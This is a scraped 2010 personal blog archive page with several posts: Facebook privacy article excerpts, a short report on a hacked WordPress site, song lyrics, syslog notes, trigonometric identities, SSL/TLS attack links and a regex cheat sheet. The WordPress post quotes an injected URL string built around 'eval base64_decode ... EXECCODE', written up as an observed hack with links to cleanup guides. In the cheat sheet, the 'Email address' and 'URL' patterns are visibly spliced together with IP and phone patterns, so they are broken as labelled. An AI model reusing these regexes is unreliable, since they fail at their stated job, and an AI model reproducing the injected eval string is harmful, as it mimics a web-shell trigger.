Eikonal Blog

2010.04.30

Facebook privacy? What Facebook privacy?

Filed under: FaceBook, privacy — sandokan65 @ 10:01

Absence of user data privacy at FaceBook:

2010.05.22:

2010.05.21:

  • an insightful comment at user discussion thread “How would you grade Facebook’s handling of users’ privacy?” (The Wall Street Journal, 2010.05.21) – http://online.wsj.com/community/groups/privacy-law-280/topics/how-would-you-grade-facebooks:

      Keep in mind, the CEO is still a punk. I don’t care how smart he may be, how much real-life experience and business experience could Zuckerberg really have? Do you expect him to be looking out for your best interests? Not a chance. He’s just another Silicon Valley huckster out to make money on YOUR information.

      I’ve been on FB for about 1.5 years now and I’ve always been skeptical about how good their privacy is. Consequently, I don’t do ANY Facebook apps. No matter which app you choose, they all require complete access to not only MY information but also to any of my FRIEND’S information. It’s one thing to give access for me, but I can’t abide by compromising my friend’s info.

      Keep in mind FB users: when you friend someone on FB, not only do they have access to all of your posts, but they also have access to any posts that your friends put on your wall. And…if your friends have “light” privacy settings, all sorts of insights could be gained by anyone about you or your friends.

  • “Facebook, MySpace Confront Privacy Loophole” (WSJ.com, 2010.05.21) – http://online.wsj.com/article/SB10001424052748704513104575256701215465596.html

      Facebook, MySpace and several other social-networking sites have been sending data to advertising companies that could be used to find consumers’ names and other personal details, despite promises they don’t share such information without consent.

      … Most social networks haven’t bothered to obscure user names or ID numbers from their Web addresses, said Craig Wills, a professor of computer science at Worcester Polytechnic Institute, who has studied the issue.

      The sites may have been breaching their own privacy policies as well as industry standards, which say sites shouldn’t share and … See Moreadvertisers shouldn’t collect personally identifiable information without users’ permission. Those policies have been put forward by advertising and Internet companies in arguments against the need for government regulation. …

      … For most social-networking sites, the data identified the profile being viewed but not necessarily the person who clicked on the ad or link. But Facebook went further than other sites, in some cases signaling which user name or ID was clicking on the ad as well as the user name or ID of the page being viewed. By seeing what ads a user clicked on, an advertiser could tell something about a user’s interests. …

      …”If you are looking at your profile page and you click on an ad, you are telling that advertiser who you are,”…

2010.05.19:

2010.05.17:

  • Facebook helps you connect and share with the people in your life. Whether you want to or not. – http://youropenbook.org/

      # What has Facebook done wrong?

      1) Facebook has made two clear mistakes here. First, they do not do a good job of indicating how public each piece of information you share on the site will be.

      2) Second, they change the rules far too often. If you understood Facebook’s privacy settings two years ago (or even six months ago) that information would be worse than useless with today’s bewildering settings.

      # How can I tell what information Facebook is sharing about me?

      There is a project here to make this information clear: http://www.rabidgremlin.com/fbprivacy/. However be warned that it does require that you trust the author of that project.

2010.05.16:

2010.05.15:

2010.05.14:

2010.05.13:

2010.05.12:

  • “The Big Game, Zuckerberg and Overplaying your Hand” (The Jason Calacanis Weblog blog) – http://calacanis.com/2010/05/12/the-big-game-zuckerberg-and-overplaying-your-hand/

      Who’s been Zucked and how? Let’s take a look back:

    • 1. FourSquare was Zucked when Facebook stole their check-in feature.
    • 2. Twitter was Zucked when Facebook stole their public facing profiles.
    • 3. Facebook users got Zucked when the site flipped their privacy
      setting–three different times!
    • 4. The co-founder of Facebook was allegedly Zucked when he was kicked out of the company he helped found.
    • 5. The founders of ConnectU got Zucked when he allegedly screwed them over by not delivering their social network and then launching Facebook at the same time–and joked about it!
    • 6. Harvard reporters reportedly got Zucked when Mark hacked their accounts to try and stop a negative story/investigation about him.
  • “Facebook’s Open Disdain For Privacy” by John Gapper (Business Insider, 2010.05.12) – http://www.businessinsider.com/mark-zuckerberg-has-recently-been-displaying-a-disregard-bordering-on-disdain-for-facebook-users-privacy-2010-5

2010.05.10:

  • “10 Things to Remember About Facebook Privacy and Security” by Don Reisinger (eWeek, 2010.05.10) – http://www.eweek.com/c/a/Cloud-Computing/10-Things-to-Remember-About-Facebook-Privacy-and-Security-495804/
    • 1. There are privacy concerns
    • 2. There are holes
    • 3. Others can only get what they’re offered
    • 4. Children have no place on Facebook
    • 5. Facebook’s privacy settings are actually useful
    • 6. The Web isn’t the place to share sensitive information
    • 7. Sometimes privacy isn’t best for a social network
    • 8. The alternatives aren’t any better
    • 9. Some privacy is gone forever
    • 10. It’s easy to blame Facebook

2010.05.07:

2010.05.05:

2010.05.04:

  • How to Delete Your Facebook Account with Extreme Prejudice (and a Bit of Style) – http://bit.ly/fb-privacy-with-style (YouTube)
  • “Top Ten Reasons You Should Quit Facebook” by Dan Yoder (GizModo) – http://gizmodo.com/5530178/

    • 10. Facebook’s Terms Of Service are completely one-sided
    • 9. Facebook’s CEO has a documented history of unethical behavior
    • 8. Facebook has flat out declared war on privacy
    • 7. Facebook is pulling a classic bait-and-switch
    • 6. Facebook is a bully
    • 5. Even your private data is shared with applications
    • 4. Facebook is not technically competent enough to be trusted
    • 3. Facebook makes it incredibly difficult to truly delete your account
    • 2. Facebook doesn’t (really) support the Open Web
    • 1. The Facebook application itself sucks

2010.05.03:

2010.05.02:

  • “Erasing Your Digital Tracks on the Web” by Tony Bradley (PcWorld, 2010.05.02) – http://www.pcworld.com/article/195270/xxx.html
    We routinely enter personal information at various sites on the Web–and the Internet never forgets. Here are some sound ways to take your data back.

    Almost half a billion people are members of Facebook, and you may very well be one of them. But have you read the Facebook Privacy Policy? If you’re like most people, the answer is no, in which case you may be only vaguely (or not at all) aware of what that policy’s mind-numbing text says with regard to the myriad ways that Facebook may share your information with other parties.

2010.04.30:

2010.04.28:

  • “Report: Facebook CEO Mark Zuckerberg Doesn’t Believe In Privacy” by Eliot Van Buskirk (Wired, 2010.04.28) – http://www.wired.com/epicenter/2010/04/report-facebook-ceo-mark-zuckerberg-doesnt-believe-in-privacy/
    “Off record chat w/ Facebook employee,” begins Bilton’s fateful tweet. “Me: How does Zuck feel about privacy? Response: [laughter] He doesn’t believe in it.”
  • “Facebook’s High Pressure Tactics: Opt-in or Else” by Sarah Perez (ReadWriteWeb, 2010.04.28) – http://www.readwriteweb.com/archives/facebooks_high_pressure_tactics_opt-in_or_else.php
    But even for those who actually do consider the implications of everything about themselves being made public, they’ll soon encounter another issue. Something that Li didn’t explain in the cheery blog post was what would happen if you refused to link to these new Pages: your profile information will be removed and your profile page will be left empty.

    … So what should your takeaway be from all this mess? Look before you link.

    In fact, it may be best if you just assume that everything on Facebook will be public from now on and act accordingly.
  • “Five ways Facebook should improve user privacy” by Ian Paul (PC World) – http://www.macworld.com/article/150901/2010/04/facebook_privacy.html
  • “A Handy Facebook-to-English Translator” by Richard Esguerra (EFF 2010.04.28) – https://www.eff.org/deeplinks/2010/04/handy-facebook-english-translator

    Term Meaning Examples
    Public information This is the term Facebook uses to describe information that it wants to share with anybody and everybody. Knowing what information Facebook considers “public” at any given moment can be confusing, but it’s key to understanding what information Facebook may share with its business partners without seeking further permission. Any time “public information” is referenced now, Facebook is talking about your: name, profile picture, current city, gender, networks, complete list of your friends, and your complete list of connections (formerly the list of pages that you were a “fan” of, but now including profile information like your hometown, education, work, activities, likes and interests, and, in some cases, your likes and recommendations from non-Facebook pages around the web).
    Visibility Facebook offers a number of controls over what information is “visible” on your profile. This determines what can be seen by someone who visits your profile page, but does not change whether the information is “public information.” “Keep in mind that Facebook Pages you connect to are public. You can control which friends are able to see connections listed on your profile, but you may still show up on Pages you’re connected to.” LIkewise, “While you do have the option to hide your Friend List from being visible on your profile, it will be available to applications you use and websites you connect with using Facebook.” Because Facebook deems this information “public,” it reserves the right to share that information with its business partners and third party websites, regardless of your visibility settings.
    Pages Facebook’s “Pages” are distinct from regular Facebook user profiles, and have generally been used to represent non-user entities like companies, non-profits, products, sports teams, musicians, etc. Community Pages are a new type of Page “dedicated to a topic or experience,” such as cooking. These will replace interests and activities. Last December, Facebook made your Page affiliations available to everyone — non-Friends, advertisers, and data miners included — by classifying Pages as publicly available information.
    Connections You create a “Connection” to most of the things that you click a “Like button” for, and Facebook will treat those relationships as public information. If you Like a Page on Facebook, that creates a public connection. If you Like a movie or restaurant on a non-Facebook website (and if that site is using Facebook’s OpenGraph system), that creates a public connection to either the applicable Page on Facebook or the affiliated website. Last week, Facebook announced a plan to transform most of the bits in your profile (including your hometown, education, work, activities, interests, and more) into connections, which are public information. If you refuse to make these items into a Connection, Facebook will remove all unlinked information.
    Social plugins Social plugins allow other websites to incorporate Facebook features and share data with Facebook. Examples of social plugins include “Like buttons” that share information back to your Facebook profile when clicked; an “Activity Feed” that will show content that you’ve Liked on that site to Facebook friends; and more. From the Facebook FAQ: “If you click “Like” or make a comment using a social plugin, your activity will be published on Facebook and shown to your Facebook friends who see an Activity Feed or Recommendations plugin on the same site. The things you like will be displayed publicly on your profile.”
    OpenGraph OpenGraph is a new Facebook program that grants any website a way to create objects that can become “connections” on Facebook user profiles. At the moment, some sites appear to be using OpenGraph in conjunction with the Facebook “Like button” in order to publish information back to your Facebook profile’s list of Pages — information that everyone is able to see. For example, the Internet Movie Database (IMDb) appears to be using OpenGraph in conjunction with the Like button social plugin. When you click to Like a movie on IMDb, that movie gets added to your list of Pages.
    Instant Personalization Instant Personalization is a pilot program that allows a few non-Facebook websites to obtain and make use your public Facebook information as soon as you visit those websites. For example, the music website Pandora receives access the list of music artists that you Liked on Facebook in order to pick songs to play (for users who are logged into Facebook and who have not opted out of instant personalization). For users that have not opted out, Instant Personalization is instant data leakage. As soon as you visit the sites in the pilot program (Yelp, Pandora, and Microsoft Docs) the sites can access your name, your picture, your gender, your current location, your list of friends, all the Pages you have Liked — everything Facebook classifies as public information. Even if you opt out of Instant Personalization, there’s still data leakage if your friends use Instant Personalization websites — their activities can give away information about you, unless you block those applications individually.

2010.04.27:

2010.04.26:

2010.04.25:

2010.04.23:

2010.04.22:

  • “How to Delete Facebook Applications (and Why You Should)” by Sarah Perez (Read Write Web, 2010.04.22) – http://www.readwriteweb.com/archives/how_to_delete_facebook_applications_and_why_you_should.php
      At Facebook’s f8 conference, founder and CEO Mark Zuckerberg announced that the company was removing restrictions on user data retention within Facebook applications. Previously, the company had a policy where developers couldn’t “store and cache any data for more than 24 hours,” Zuckerberg said while speaking to the audience of Facebook developers crowded into the San Francisco Design Center on Wednesday. “We’re going to go ahead and…get rid of that policy,” he said. The audience cheered. …
      …. How to Remove Facebook Applications: … there is something very easy everyone can do to minimize their risk and that’s delete the Facebook applications you no longer use. The process of doing so is incredibly simple. After signing into Facebook, do the following:

      • 1. Click on “Account” at the top-right of the screen.
      • 2. Click “Application Settings”
      • 3. Change the “Show” drop-down box to “Authorized.” This will show all the applications you’ve ever given permission to.
      • 4. In the resulting list, click the “X” button on the far right next to each app you want to remove to delete it.
      • 5. On the pop-up box that appears, click “Remove” then click “Okay” on the next box confirming the app was deleted.

      Repeat this process to remove all the apps you no longer use on a regular basis….

  • “Facebook’s Ambition” by Robert Scoble (Business Insider, Apr. 22, 2010) – http://www.businessinsider.com/facebooks-ambition-2010-4
  • “Facebook Plots its Future: Will it Be Our Overlord?” by Peter Smith (PCWorld, 2010.04.22) – http://www.pcworld.com/article/194765/facebook_plots_its_future_will_it_be_our_overlord.htmll
  • “Why I, Like, Really Dislike Facebook’s ‘Like’ Button” by Dan Tynan (PCWorld, 2010.04.22) – http://www.pcworld.com/article/194818/why_i_like_really_dislike_facebooks_like_button.html
  • “Facebook: Privacy Enemy Number One?” by Dan Costa (PCMagazine, 2010.04.22) – http://www.pcmag.com/article2/0,2817,2362967,00.asp
  • “How to Opt Out of Facebook’s Instant Personalization” by Kurt Opsahl (EEF, 2010.04.22) – http://www.eff.org/deeplinks/2010/04/how-opt-out-facebook-s-instant-personalization

2010.04.21:

2010.04.13:

  • “What’s a Little Cyberbullying Among Friends? Facebook Launches New Safety Center
    Written” by Sarah Perez (2010.04.13) – http://www.readwriteweb.com/archives/facebook_launches_safety_center_to_educate_users.php

      … It’s a somewhat ironic statement from a company that recently prompted its 400-plus million users to accept “recommended” changes that opened up their data – including status updates, photos, videos, links and friend lists – to a public audience, revealing details that many users assumed were private.

      Around the same time as the “privacy debacle,” as we like to call it, unfolded, Facebook also announced a “Safety Advisory Board,” a group whose purpose is to review safety-related procedures and documentation as well as make suggestions regarding best practices and other procedures. How about this safe practice, Facebook: don’t publicize people’s private information?

2010.04.10:

2010.04.05:

2010.03:

2010.02:

2010.01:

Older:

General:


Related:

2010.04.27

WordPress attacks

Filed under: infosec — sandokan65 @ 13:28

Following a link posted recently in the sci.physics.research USENET newsgroup, I stepped upon an example of the WordPress exploit that some sites wrote recently. The web server redirects your browser request to the URL that in addition to the original requested URL has tucked at its end following string

%&evalbase64_decode_SERVERHTTP_EXECCODE.+&%/

. The content of that page is:

400 Bad Request
-----------------------------------------------------
nginx

First example (that I have seen) of hacked WordPress-based blog.

The discussion at the address http://wordpress.org/support/topic/383414 gives some usefull links on that type of hack:

If that’s happening on your blog, then you’ve been hacked.

Make a new backup of your files and database and save that:

Give this a good read:
http://codex.wordpress.org/FAQ_My_site_was_hacked

This is also good and referenced in that article: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Once you’ve deloused your installation consider hardening your blog using this guide:
http://codex.wordpress.org/Hardening_WordPress

2010.04.26

War of the gods

Filed under: music — Tags: , — sandokan65 @ 22:45

Billy Paul – 1973

The time has come, for bad things to end
The time has come, for life to begin
The time has come for the War of the Gods

Lucifer, oh lucifer
God of evil, you're the god of hate
We see you every day
Father of the light
Your main man died
When the light shines
You're running hot
The darkness is when you find your light
Master of tricks,the master of pain
I said;
You're the one, you're the one who has no shame
Lucifer, Sa-tan the devils your name
Do you have time to get your army ready
You know love conquers all
Will you stand, will you stand
Or will you fall
The time has come
For bad things to end
The time has come
For life to begin
The time has come
For the War of the Gods

God is just a title
It's like calling somebody father,
Preacher, President or General
Allah, Buddha, Hare Krishna,
Jehova, just the mention of you
Some people even call, call Jesus God too.

Love, Peace and Eternal Life
Is every word
To anyone who knocks on your doors

There’s only one God that’s true

You know,
The name is not the same
One day the people of the world
Will know your Great Name
You are the Strong
And you are The Mighty
I hope I’m with you
When they start the fighting
The War of the Gods

Love, Peace and Eternal Life
Is what I want
Love, Peace and Eternal Life
Is what I want

God, God
You are The Strong
And you are The Mighty
I hope I'm with You
When they start the fighting
Lawd!

Lucifer,
Satan, the devil your name,
Have you had time,
to get your army ready?
to get your army ready?


Lucifer, god of evil
Hey, we see you everyday:
The father of the light
He knows you start to running hot

The darkness,
Is where, is where, is where, is where, is where
Gotta talk ‘bout you because thats you find youre the light

God!
????
God!
You make you feel so good this morning

God!

We gon talk about,

Lucifer, lucifer, lucifer, lucifer,

God....Kicked you out of heaven
cause you didn’t pay your rent.

God.....Kicked you out of heaven
cause you didn’t pay your rent.

God.....Kicked you out of heaven
cause you didn’t pay your rent.

And He is The Strong
He is The Mighty… 

2010.04.24

Modern art

Filed under: art and fun — sandokan65 @ 20:53

GOTO: Interesting visual arts sites – https://eikonal.wordpress.com/2011/04/15/interesting-visual-arts-sites/

2010.04.22

Social networks privacy

Filed under: privacy — Tags: — sandokan65 @ 12:41
  • “Hotmail’s social networking busts your privacy” by By Woody Leonhard (WindowsSecrets 2010.04.22)- http://windowssecrets.com/comp/100422#story1
      In its rush to take on Facebook and Google Buzz, Microsoft is now collecting and displaying personal information on your Hotmail page — information you may never have wanted to broadcast….

Related:

2010.04.20

Unix hardening

General

Passwords

Logging and auditing


Related:

2010.04.14

Soviet Socialist Republic Of USA

Filed under: society — Tags: — sandokan65 @ 14:37

Er, not really. See “Nine Myths about Socialism in the US” (2010.04.10 @ CommonDreams.org) by Bill Quigley – http://www.commondreams.org/view/2010/04/10

2010.04.13

Logging

Filed under: infosec, logging — Tags: , , , , , , — sandokan65 @ 14:27

Sites

Logging tools

Articles and Papers

Syslog

    The standard UNIX syslog facilities are

    • kern – kernel
    • user – application or user processes (this is the default if the application sending a message does not specify the facility)
    • mail/news/UUCP/cron – electronic mail/NNTP/UUCP/cron subsystems
    • daemon – system daemons
    • auth – authentication (login) and authorization related commands
    • lpr – line printer spooling subsystem
    • mark – inserts timestamp into log data at regular intervals
    • local0-local7 – 8 facilities for customized auditing
    • syslog – internal messages generated by syslog itself
    • authpriv – non-system authorization messages
    • * — on most versions of UNIX, refers to all facilities except mark

    Syslog message levels:

    • 0 Emergency (emerg) – system is or will be unusable if situation is not resolved
    • 1 Alert (alert) – immediate action required
    • 2 Critical (crit) – critical conditions
    • 3 Error (error) – error conditions
    • 4 Warning (warning) – warning conditions, recoverable errors
    • 5 Notice (notice) – normal but significant condition; unusual situation that merits investigation; a significant event that is typically part of normal day-to-day operation
    • 6 Informational (info) – informational messages
    • 7 Debug (debug) – debug-level messages; verbose data for debugging

    Syslog actions:

    • filename – write message to the specified file on the local machine
    • @hostname or @ipaddress – forward message to remote loghost
    • user1,user2,… — write message to consoles of users named in list, if user is logged-in
    • * — write message to all logged-in users

    Links:

Memetics

The secret life of misquotes

Various


More: Memetic diseases – https://eikonal.wordpress.com/2011/05/12/memetic-diseases/

2010.04.09

Simple expression for trigonometric functions of mutiple of an angle

Filed under: mathematics — Tags: , , , , , , — sandokan65 @ 15:16
  • \sin(n x) = \frac{i}2 [(\cos(x)-i \sin(x))^n - (\cos(x)+i \sin(x))^n],
  • \cos(n x) = \frac12 [(\cos(x)-i \sin(x))^n + (\cos(x)+i \sin(x))^n],
  • \tan(n x) = i \frac{(1-i \tan(x))^n - (1+i \tan(x))^n}{(1-i \tan(x))^n + (1+i \tan(x))^n}

Examples:

  • \sin(2x) = 2 \sin(x) \cos(x),
  • \sin(3x) = \sin(x) [3\cos(x)^2-\sin(x)^2],
  • \sin(4x) = 4 \sin(x) \cos(x) [\cos(x)^2-\sin(x)^2],
  • \sin(5x) = \sin(x) [5 \cos(x)^4 - 10 \cos(x)^2 \sin(x)^2 + \sin(x)^4],
  • \cos(2x) = [\cos(x)^2-\sin(x)^2] ,
  • \cos(3x) = \cos(x) [\cos(x)^2- 3 \sin(x)^2] ,
  • \cos(4x) = [\cos(x)^4 - 6 \cos(x)^2 \sin(x)^2 + \sin(x)^4],
  • \cos(5x) = \cos(x) [\cos(x)^4 - 10 \cos(x)^2 \sin(x)^2 + 5 \sin(x)^4],
  • \tan(2x) = \frac{2\tan(x)}{1-\tan(x)^2},
  • \tan(3x) = \frac{\tan(x)[3-\tan(x)^2]}{1-3\tan(x)^2},
  • \tan(4x) = \frac{4\tan(x)[1-\tan(x)^2]}{1-6\tan(x)^2+\tan(x)^4},
  • \tan(5x) = \frac{\tan(x)[5- 10 \tan(x)^2 + \tan(x)^4]}{1-10\tan(x)^2+5\tan(x)^4}, …

Much more on the web:

Atheism, Secularism, Critical Thinking, etc

General

Richard Dawkins

Daniel Dennett

Christopher Hitchens

Various


Articles


Here at this blog: Bertrand Russell – https://eikonal.wordpress.com/2010/09/14/bertrand-russell/.

Shodan search engine

Filed under: infosec — Tags: — sandokan65 @ 13:24

A search engine for web nodes with exposed ports 21, 22, 23 and 80.

More info:

2010.04.08

SSL/TLS In-Security

Filed under: infosec — Tags: , , , , , , — sandokan65 @ 13:53

2011.09: BEAST – Browser Exploit Against SSL/TLS

  • BEAST demo (2011.09.25) – http://vnhacker.blogspot.com/2011/09/beast.html
  • “Firefox devs mull dumping Java to stop BEAST attacks” (“‘Horrible user experience’ for your own good”) by Dan Goodin (The Register; 2011.09.29) – http://www.theregister.co.uk/2011/09/29/firefox_killing_java/
  • “World takes notice as SSL-chewing BEAST is unleashed- Google, Microsoft, Mozilla patch cracks in net’s foundation of trust” by Dan Goodin (The Register; 2011.09.27) – http://www.theregister.co.uk/2011/09/27/beast_attacks_paypay/
    • To be fair, Duong and Rizzo’s exploit isn’t the easiest to pull off. Attackers must already control the network used by the intended victim, and they can only recover secret information that’s transmitted repeatedly in a predictable location of the encrypted data stream. They must also have means to subvert a safety mechanism built into the web known as the same-origin policy, which dictates that data set by one domain name can’t be read or modified by a different address.
  • “Security impact of the Rizzo/Duong CBC “BEAST” attack” by EKR (2011.10.23) – http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html
  • “What does the SSL/TLS BEAST exploit mean for my web-based file transfer application?” by Jonathan Lampe (2011.09.20) – http://www.filetransferconsulting.com/file-transferbeast-tls-vulnerability/
  • “BEAST: Surprising crypto attack against HTTPS” – http://www.ekoparty.org/cronograma.php
      \We present a new fast block-wise chosen-plaintext attack against SSL/TLS. We also describe one application of the attack that allows an adversary to efficiently decrypt and obtain authentication tokens and cookies from HTTPS requests. Our exploit abuses a vulnerability present in the SSL/TLS implementation of major Web browsers at the time of writing.
  • “Researchers Exploit Flaws in Browser SSL/TLS Encryption” by Brian Prince – http://www.securityweek.com/researchers-exploit-flaws-browser-ssltls-encryption
    • fast block-wise chosen-plaintext attack against SSL/TLS
    • “We also describe one application of the attack that allows an adversary to efficiently decrypt and obtain authentication tokens and cookies from HTTPS requests. Our exploit abuses a vulnerability present in the SSL/TLS implementation of major Web browsers at the time of writing.”
    • “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol,”
    • the attack impacts TLS 1.0 and SSL 3.0, but does not affect TLS versions 1.1 and 1.2
  • “Researchers crack SSL encryption” by Zeljka Zorz (Help Net Security; 2011.09.21) – http://www.net-security.org/secworld.php?id=11664
    • The revelation that the last two versions (1.1 and 1.2) of the TLS cryptographic protocol are safe from such an attack gives almost no satisfaction, as the overwhelming majority of websites protected by it support version 1.0.
    • BEAST consists of JavaScript code that gets inserted in the user’s browser and works with a network sniffer to decrypt the cookies that carry the information – username and password – that allows users to access their accounts.
    • “BEAST is different than most published attacks against HTTPS,” Duong shared with The Register. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”
    • He also claimed that with recently made improvements, it is able to decrypt a typical 1,000 to 2,000 characters long cookie in under ten minutes. Also, that other applications that use the vulnerable TLS version – such as instant messaging and VPN programs – could be attacked with BEAST.
  • “Hackers break SSL encryption used by millions of sites – Beware of BEAST decrypting secret PayPal cookies” by Dan Goodin (The Register; 2011.09.19) – http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
    • Although TLS 1.1 has been available since 2006 and isn’t susceptible to BEAST’s chosen plaintext attack, virtually all SSL connections rely on the vulnerable TLS 1.0, according to a recent research from security firm Qualys that analyzed the SSL offerings of the top 1 million internet addresses.
    • Chief culprits for the inertia are the Network Security Services (http://www.mozilla.org/projects/security/pki/nss/) package used to implement SSL in Mozilla’s Firefox and Google’s Chrome browsers, and OpenSSL (Ma href=”http://openssl.org/’>http://openssl.org/), an open-source code library that millions of websites use to deploy TLS. In something of a chicken-and-egg impasse, neither toolkit offers recent versions of TLS, presumably because the other one doesn’t.

2011.01: Hacked certificate authorities

  • “Qualys endorses alternative to crappy SSL system” by Dan Goodin (The Register; 2011.09.30) – http://www.theregister.co.uk/2011/09/30/qualys_endorses_convergence/
  • “Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL” (Cryptogon.com; 2011.01.31) – http://cryptogon.com/?p=20288 | download – http://files.cloudprivacy.net/ssl-mitm.pdf.
      Abstract: This paper introduces the compelled certificate creation attack, in which government agencies may compel a certificate authority to issue false SSL certificates that can be used by intelligence agencies to covertly intercept and
      hijack individuals’ secure Web-based communications. Although we do not have direct evidence that this form of active surveillance is taking place in the wild, we show how products already on the market are geared and marketed towards this kind of use—suggesting such attacks may occur in the future, if they are not already occurring. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks.
  • “In SSL We Trust? Not Lately” by Wolfgang Kandek (Dark Reading; 2010.04.07) – http://www.darkreading.com/blog/archives/2010/04/trust_in_ssl_st.html
  • “Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL” (2010.03) – http://paranoia.dubfire.net/2010/03/new-paper.html | http://files.cloudprivacy.net/ssl-mitm.pdf
      Abstract: This paper introduces a new attack, the compelled certificate creation attack, in which government agencies compel a certificate authority to issue false SSL certificates that are then used by intelligence agencies to covertly intercept and hijack individuals’ secure Web-based communications. We reveal alarming evidence that suggests that this attack is in active use. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks.
  • “Governments Using Forged SSL Certificates for Man in the Middle Attack on “Secure” Web Sessions” (Cryptogon.com; 2010.03.25) – http://cryptogon.com/?p=14505
  • “Law Enforcement Appliance Subverts SSL” by Ryan Singel (Wired; 2010.03.24) – http://www.wired.com/threatlevel/2010/03/packet-forensics/

2010.04.06

FAQ makers/creators

Filed under: it, javascript — Tags: , , , — sandokan65 @ 15:30

JavaScript code sites

Filed under: javascript — Tags: — sandokan65 @ 15:26

Urban myths

Filed under: memetics — Tags: , , , — sandokan65 @ 12:48

2010.04.02

Regular expressions

Sites

Tools

Standalone tools:

Online testers:

Books

Tidbits

Sources: The above links.

  • [abc] – A single character: a, b or c
  • [^abc] – Any single character but a, b, or c
  • [a-z] – Any single character in the range a-z
  • [a-zA-Z] – Any single character in the range a-z or A-Z
  • ^ – Start of line
  • $ – End of line
  • \A – Start of string
  • \z – End of string
  • . – Any single character
  • \s – Any whitespace character
  • \S – Any non-whitespace character
  • \d – Any digit
  • \D – Any non-digit
  • \w – Any word character (letter, number, underscore)
  • \W – Any non-word character
  • \b – Any word boundary character
  • (…) – Capture everything enclosed
  • (a|b) – a or b
  • a? – Zero or one of a
  • a* – Zero or more of a
  • a+ – One or more of a
  • a{3} – Exactly 3 of a
  • a{3,} – 3 or more of a
  • a{3,6} – Between 3 and 6 of a
  • ^\s[ \t]*$ – Match a blank line
  • \d{2}-\d{5} – Validate an ID number consisting of 2 digits, a hyphen, and another 5 digits

Special common strings:

  • Personal Name: ^[\w\.\’]{2,}([\s][\w\.\’]{2,})+$
  • Username: ^[\w\d\_\.]{4,}$
  • Password at least 6 symbols: ^.{6,}$
  • Password or empty input: ^.{6,}$|^$
  • email: ^[\_]*([a-z0-9]+(\.|\_*)?)+@([a-z][a-z0-9\-]+(\.|\-*\.))+[a-z]{2,6}$
  • Email address: \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b[A-z0-9_.%+-]+@[A-z0-9_.%+-]+\.[A-z]{2,4}
  • US phone: \W?\d{3}\W?\d{3}\W?\d{4}
  • US Phone number: ^\+?[\d\s]{3,}$
  • US Phone with code: ^\+?[\d\s]+\(?[\d\s]{10,}$
  • URL: \W?\d{3}\W?\d{3}\W?\d{4}\b\w+://(\w|-|\.|/)+(/|\b)
  • US Social Security Number (SSN): \d{3}-\d{2}-\d{4}
  • US ZIP: \d{5}(-\d{4})?
  • IP (v4) address: \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b
  • IP (v4) address: \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
  • IP (v4) address: ^(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5]){3}$
  • IP (v4) address: \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
  • IP (v4) address: \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
  • IP (v6) address:
  • MAC address: ^([0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F])$
  • Positive Integers: ^\d+$
  • Negative Integers: ^-\d+$
  • Integer: ^-{0,1}\d+$
  • Positive Number: ^\d*\.{0,1}\d+$
  • Negative Number: ^-\d*\.{0,1}\d+$
  • Positive Number or Negative Number: ^-{0,1}\d*\.{0,1}\d+$
  • Floating point number: [-+]?([0-9]*\.[0-9]+|[0-9]+)
  • Floating point number: [-+]?(?:\b[0-9]+(?:\.[0-9]*)?|\.[0-9]+\b)(?:[eE][-+]?[0-9]+\b)?
  • Roman number: ^(?i:(?=[MDCLXVI])((M{0,3})((C[DM])|(D?C{0,3}))?((X[LC])|(L?XX{0,2})|L)?((I[VX])|(V?(II{0,2}))|V)?))$
  • Domain Name: ^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}$
  • Domain Name: ^([a-z][a-z0-9\-]+(\.|\-*\.))+[a-z]{2,6}$
  • Windows File Name: (?i)^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\\\./:\*\?\”\|][^\\/:\*\?\”\|]{0,254}$
  • Date in format yyyy-MM-dd: (19|20)\d\d([- /.])(0[1-9]|1[012])\2(0[1-9]|[12][0-9]|3[01])
  • Date (dd mm yyyy, d/m/yyyy, etc.): ^([1-9]|0[1-9]|[12][0-9]|3[01])\D([1-9]|0[1-9]|1[012])\D(19[0-9][0-9]|20[0-9][0-9])$
  • Year 1900-2099: ^(19|20)[\d]{2,2}$

Related (here at this blog):
Command line based text replace – https://eikonal.wordpress.com/2010/07/13/command-line-based-text-replace/ |
Perl online – https://eikonal.wordpress.com/2010/02/15/perl-online/

Blog at WordPress.com.